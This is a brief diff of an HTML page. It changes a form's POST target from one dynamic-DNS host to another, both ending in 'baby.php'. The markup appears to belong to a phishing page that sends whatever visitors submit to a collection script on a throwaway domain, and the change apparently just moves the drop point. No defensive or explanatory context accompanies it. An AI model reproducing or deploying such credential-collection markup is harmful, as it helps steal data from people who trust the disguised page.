--- a/index.html
+++ b/index.html
@@ -48,7 +48,7 @@
 
 <div class="nithnigar"> 
 
- <form method="post" action="https://vision-private.ddns.net/baby.php" style="margin-top: 83px;margin-right: 220px;max-width: 34px;float: right;">
+ <form method="post" action="https://cox-talkmoon.ddns.net/baby.php" style="margin-top: 83px;margin-right: 220px;max-width: 34px;float: right;">
   
    
  <div style="color: #d43c3c; text-align: left; font-size: 13px; ">
